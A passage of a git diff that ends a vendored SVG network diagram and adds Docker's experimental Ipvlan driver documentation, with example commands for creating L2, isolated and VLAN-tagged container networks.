100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0,0) matrix(1,0,0,1,345.51767083236393,86.4615119485293)"><g><g transform="translate(0,0) scale(1.7520258247164675,1.25824690354917) translate(0.00001348378,-0.001498589)"><g><g><path fill="#FFFFFF" stroke="#cc0000" d="M 33.84 5.912 C 16.263 2.403 6.986 11.405 8.451 19.186 L 8.57 19.61 C -5.128 21.942 -1.537 38.106 5.033 38.106 L 5.679 38.085 C 4.026 45.68 20.032 53.41 28.958 49.548 L 29.531 48.92 C 32.713 55.752 44.02 56.893 55.201 57.177 C 64.89 57.425 70.546 56.658 74.702 52.411 L 75.341 52.599 C 90.852 53.845 97.915 43.133 94.526 35.442 L 95.36 35.207 C 100.648 33.808 101.258 21.602 92.187 19.797 L 92.361 19.325 C 96.299 11.385 87.011 3.896 74.124 5.303 L 73.23 4.837 C 64.003 -3.517 37.449 -2.157 34.373 6.108 L 33.84 5.912 Z" stroke-miterlimit="10" stroke-width="2"/></g></g></g></g></g><g transform="matrix(1,0,0,1,365,101)"><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="56" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="18" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="18" y="12">Gateway</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="69" y="0" width="51" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="69" y="12">10</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="82" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="86" y="12">1</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="92" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="96" y="12">30</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="109" y="12">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="bold" text-decoration="" line-height="14px" x="112" y="12">1</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="14" width="137" height="28" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="2" y="14" width="4" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="14" width="58" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="9" y="26">and</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="32" y="26">other</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="63" y="14" width="129" height="28" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="63" y="26">containers</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="122" y="26">on</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="7" y="40">the</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="27" y="40">same</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="59" y="40">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="91" y="40">/</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="94" y="28" width="37" height="14" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="12px" font-style="normal" font-weight="normal" text-decoration="" line-height="14px" x="94" y="40">subnet</text></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="42" width="137" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g><rect fill="rgb(0,0,0)" stroke="none" x="67" y="42" width="5" height="14" fill-opacity="0"/></g></g><g transform="translate(318,224) matrix(1,0,0,1,0,0) translate(-318,-224)"><g/></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,451.9019607843137,158.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,447.48549019607844,154.15384615384616)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,442,149.00000000000003)"><g><g transform="translate(0,0) scale(0.3709803921568625,0.18000000000000005)"><g><path fill="#4cacf5" stroke="none" d="M 0 0 L 100 0 Q 100 0 100 0 L 100 100 Q 100 100 100 100 L 0 100 Q 0 100 0 100 L 0 0 Q 0 0 0 0 Z"/><g transform="scale(2.6955602536997905,5.5555555555555545)"><path fill="none" stroke="none" d="M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z"/><path fill="none" stroke="#666666" d="M 0 0 M 0 0 L 37.09803921568625 0 Q 37.09803921568625 0 37.09803921568625 0 L 37.09803921568625 18.000000000000004 Q 37.09803921568625 18.000000000000004 37.09803921568625 18.000000000000004 L 0 18.000000000000004 Q 0 18.000000000000004 0 18.000000000000004 L 0 0 Q 0 0 0 0 Z" stroke-miterlimit="10"/></g></g></g></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,47,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#5fcc5a" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,50,342)"><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="135" height="40" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="135" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="0" width="127" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="58" y="17">:</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="5" y="0" width="54" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="5" y="17">Parent</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="68" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="68" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="105" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="110" y="17">10</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="135" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="20" width="71" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="17" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="69" y="37">ID</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="87" y="20" width="6" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="87" y="37">:</text></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="93" y="20" width="26" height="20" fill-opacity="0"/></g></g><g transform="translate(373,100) matrix(1,0,0,1,0,0) translate(-373,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="98" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="98" y="37">10</text></g></g><g transform="translate(0.5,0.5) matrix(1,0,0,1,367,331)"><g transform="translate(4,4) scale(1.0034722222222223,1.0083333333333333)"><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#000000" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.294117647"/><path fill="none" stroke="rgb(0,0,0)" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-opacity="0" stroke-miterlimit="10" opacity="0.294117647"/></g></g></g></g></g><g><g transform="translate(0,0) scale(1.44,0.6)"><g><path fill="none" stroke="none" d="M 10 0 L 90 0 Q 100 0 100 10 L 100 90 Q 100 100 90 100 L 10 100 Q 0 100 0 90 L 0 10 Q 0 0 10 0 Z"/><g transform="scale(0.6944444444444444,1.6666666666666667)"><path fill="#eb6c6c" stroke="none" d="M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" opacity="0.99"/><path fill="none" stroke="#434343" d="M 10 0 M 10 0 L 134 0 Q 144 0 144 10 L 144 50 Q 144 60 134 60 L 10 60 Q 0 60 0 50 L 0 10 Q 0 0 10 0 Z" stroke-miterlimit="10" opacity="0.99"/></g></g></g></g></g><g transform="matrix(1,0,0,1,369,341)"><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="138" height="40" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="138" height="20" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="4" y="0" width="132" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="9" y="17">Parent</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="62" y="17">:</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="72" y="0" width="63" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="72" y="17">eth0</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="109" y="17">.</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="114" y="17">30</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="20" width="138" height="20" fill-opacity="0"/></g></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="30" y="20" width="78" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="30" y="37">VLAN</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="normal" text-decoration="" line-height="20.5px" x="77" y="37">:</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g><rect fill="rgb(0,0,0)" stroke="none" x="88" y="20" width="21" height="20" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="18px" font-style="normal" font-weight="bold" text-decoration="" line-height="20.5px" x="88" y="37">30</text></g><g transform="translate(194,100) matrix(1,0,0,1,0,0) translate(-194,-100)"><g/></g></g><g transform="matrix(1,0,0,1,371,44)"><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="142" height="32" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="0" width="142" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="0" width="75" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="17" y="0" width="75" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="17" y="14">Network</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="72" y="14"> &amp;&#160;</text></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="90" y="0" width="36" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="90" y="0" width="36" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="90" y="14">other</text></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="0" y="16" width="142" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="26" y="16" width="92" height="16" fill-opacity="0"/></g></g><g transform="translate(266,48) matrix(1,0,0,1,0,0) translate(-266,-48)"><g><rect fill="rgb(0,0,0)" stroke="none" x="26" y="16" width="92" height="16" fill-opacity="0"/></g><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="26" y="30">Docker</text><text fill="rgb(0, 0, 0)" stroke="none" font-family="Arial" font-size="14px" font-style="normal" font-weight="bold" text-decoration="" line-height="16.5px" x="77" y="30">Hosts</text></g></g></g></svg>
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/experimental/vlan-networks.md b/vendor/github.com/docker/docker/experimental/vlan-networks.md
new file mode 100644
index 0000000000..caec6d6c6b
--- /dev/null
+++ b/vendor/github.com/docker/docker/experimental/vlan-networks.md
@@ -0,0 +1,471 @@
+# Ipvlan Network Driver
+
+### Getting Started
+
+The Ipvlan driver is currently in experimental mode in order to incubate Docker users use cases and vet the implementation to ensure a hardened, production ready driver in a future release. Libnetwork now gives users total control over both IPv4 and IPv6 addressing. The VLAN driver builds on top of that in giving operators complete control of layer 2 VLAN tagging and even Ipvlan L3 routing for users interested in underlay network integration. For overlay deployments that abstract away physical constraints see the [multi-host overlay ](https://docs.docker.com/engine/userguide/networking/get-started-overlay/) driver.
+
+Ipvlan is a new twist on the tried and true network virtualization technique. The Linux implementations are extremely lightweight because rather than using the traditional Linux bridge for isolation, they are simply associated to a Linux Ethernet interface or sub-interface to enforce separation between networks and connectivity to the physical network.
+
+Ipvlan offers a number of unique features and plenty of room for further innovations with the various modes. Two high level advantages of these approaches are, the positive performance implications of bypassing the Linux bridge and the simplicity of having less moving parts. Removing the bridge that traditionally resides in between the Docker host NIC and container interface leaves a very simple setup consisting of container interfaces, attached directly to the Docker host interface. This result is easy access for external facing services as there is no port mappings in these scenarios.
+
+### Pre-Requisites
+
+- The examples on this page are all single host and setup using Docker experimental builds that can be installed with the following instructions: [Install Docker experimental](https://github.com/docker/docker/tree/master/experimental)
+
+- All of the examples can be performed on a single host running Docker. Any examples using a sub-interface like `eth0.10` can be replaced with `eth0` or any other valid parent interface on the Docker host. Sub-interfaces with a `.` are created on the fly. `-o parent` interfaces can also be left out of the `docker network create` all together and the driver will create a `dummy` interface that will enable local host connectivity to perform the examples.
+
+- Kernel requirements:
+ 
+ - To check your current kernel version, use `uname -r` to display your kernel version
+ - Ipvlan Linux kernel v4.2+ (support for earlier kernels exists but is buggy)
+
+### Ipvlan L2 Mode Example Usage
+
+The ipvlan `L2` mode example is like the following image. The driver is specified with `-d driver_name` option. In this case `-d ipvlan`.
+
+![Simple Ipvlan L2 Mode Example](images/ipvlan_l2_simple.png)
+
+The parent interface in the next example `-o parent=eth0` is configured as followed:
+
+```
+ip addr show eth0
+3: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
+    inet 192.168.1.250/24 brd 192.168.1.255 scope global eth0
+```
+
+Use the network from the host's interface as the `--subnet` in the `docker network create`. The container will be attached to the same network as the host interface as set via the `-o parent=` option.
+
+Create the ipvlan network and run a container attaching to it:
+
+```
+# Ipvlan  (-o ipvlan_mode= Defaults to L2 mode if not specified)
+docker network  create -d ipvlan \
+    --subnet=192.168.1.0/24 \ 
+    --gateway=192.168.1.1 \
+    -o ipvlan_mode=l2 \
+    -o parent=eth0 db_net
+
+# Start a container on the db_net network
+docker  run --net=db_net -it --rm alpine /bin/sh
+
+# NOTE: the containers can NOT ping the underlying host interfaces as
+# they are intentionally filtered by Linux for additional isolation.
+```
+
+The default mode for Ipvlan is `l2`. If `-o ipvlan_mode=` are left unspecified, the default mode will be used. Similarly, if the `--gateway` is left empty, the first usable address on the network will be set as the gateway. For example, if the subnet provided in the network create is `--subnet=192.168.1.0/24` then the gateway the container receives is `192.168.1.1`.
+
+To help understand how this mode interacts with other hosts, the following figure shows the same layer 2 segment between two Docker hosts that applies to and Ipvlan L2 mode.
+
+![Multiple Ipvlan Hosts](images/macvlan-bridge-ipvlan-l2.png)
+
+The following will create the exact same network as the network `db_net` created prior, with the driver defaults for `--gateway=192.168.1.1` and `-o ipvlan_mode=l2`.
+
+```
+# Ipvlan  (-o ipvlan_mode= Defaults to L2 mode if not specified)
+docker network  create -d ipvlan \
+    --subnet=192.168.1.0/24 \ 
+    -o parent=eth0 db_net_ipv
+
+# Start a container with an explicit name in daemon mode
+docker  run --net=db_net_ipv --name=ipv1 -itd alpine /bin/sh
+
+# Start a second container and ping using the container name
+# to see the docker included name resolution functionality
+docker  run --net=db_net_ipv --name=ipv2 -it --rm alpine /bin/sh
+ping -c 4 ipv1
+
+# NOTE: the containers can NOT ping the underlying host interfaces as
+# they are intentionally filtered by Linux for additional isolation.
+```
+
+The drivers also support the `--internal` flag that will completely isolate containers on a network from any communications external to that network. Since network isolation is tightly coupled to the network's parent interface the result of leaving the `-o parent=` option off of a network create is the exact same as the `--internal` option. If the parent interface is not specified or the `--internal` flag is used, a netlink type `dummy` parent interface is created for the user and used as the parent interface effectively isolating the network completely.
+
+The following two `docker network create` examples result in identical networks that you can attach container to:
+
+```
+# Empty '-o parent=' creates an isolated network
+docker network  create -d ipvlan \
+    --subnet=192.168.10.0/24 isolated1
+
+# Explicit '--internal' flag is the same:
+docker network  create -d ipvlan \
+    --subnet=192.168.11.0/24 --internal isolated2
+
+# Even the '--subnet=' can be left empty and the default 
+# IPAM subnet of 172.18.0.0/16 will be assigned
+docker network  create -d ipvlan isolated3
+
+docker run --net=isolated1 --name=cid1 -it --rm alpine /bin/sh
+docker run --net=isolated2 --name=cid2 -it --rm alpine /bin/sh
+docker run --net=isolated3 --name=cid3 -it --rm alpine /bin/sh
+
+# To attach to any use `docker exec` and start a shell
+docker exec -it cid1 /bin/sh
+docker exec -it cid2 /bin/sh
+docker exec -it cid3 /bin/sh
+```
+
+### Ipvlan 802.1q Trunk L2 Mode Example Usage
+
+Architecturally, Ipvlan L2 mode trunking is the same as Macvlan with regard to gateways and L2 path isolation. There are nuances that can be advantageous for CAM table pressure in ToR switches, one MAC per port and MAC exhaustion on a host's parent NIC to name a few. The 802.1q trunk scenario looks the same. Both modes adhere to tagging standards and have seamless integration with the physical network for underlay integration and hardware vendor plugin integrations.
+
+Hosts on the same VLAN are typically on the same subnet and almost always are grouped together based on their security policy. In most scenarios, a multi-tier application is tiered into different subnets because the security profile of each process requires some form of isolation. For example, hosting your credit card processing on the same virtual network as the frontend webserver would be a regulatory compliance issue, along with circumventing the long standing best practice of layered defense in depth architectures. VLANs or the equivocal VNI (Virtual Network Identifier) when using the Overlay driver, are the first step in isolating tenant traffic.
+
+![Docker VLANs in Depth](images/vlans-deeper-look.png)
+
+The Linux sub-interface tagged with a vlan can either already exist or will be created when you call a `docker network create`. `docker network rm` will delete the sub-interface. Parent interfaces such as `eth0` are not deleted, only sub-interfaces with a netlink parent index > 0.
+
+For the driver to add/delete the vlan sub-interfaces the format needs to be `interface_name.vlan_tag`. Other sub-interface naming can be used as the specified parent, but the link will not be deleted automatically when `docker network rm` is invoked. 
+
+The option to use either existing parent vlan sub-interfaces or let Docker manage them enables the user to either completely manage the Linux interfaces and networking or let Docker create and delete the Vlan parent sub-interfaces (netlink `ip link`) with no effort from the user.
+
+For example: `eth0.10` to denote a sub-interface of `eth0` tagged with vlan id `10`. The equivalent `ip link` command would be `ip link add link eth0 name eth0.10 type vlan id 10`.
+
+The example creates the vlan tagged networks and then start two containers to test connectivity between containers. Different Vlans cannot ping one another without a router routing between the two networks. The default namespace is not reachable per ipvlan design in order to isolate container namespaces from the underlying host.
+
+**Vlan ID 20**
+
+In the first network tagged and isolated by the Docker host, `eth0.20` is the parent interface tagged with vlan id `20` specified with `-o parent=eth0.20`. Other naming formats can be used, but the links need to be added and deleted manually using `ip link` or Linux configuration files. As long as the `-o parent` exists anything can be used if compliant with Linux netlink.
+
+```
+# now add networks and hosts as you would normally by attaching to the master (sub)interface that is tagged
+docker network  create  -d ipvlan \
+    --subnet=192.168.20.0/24 \
+    --gateway=192.168.20.1 \
+    -o parent=eth0.20 ipvlan20
+
+# in two separate terminals, start a Docker container and the containers can now ping one another.
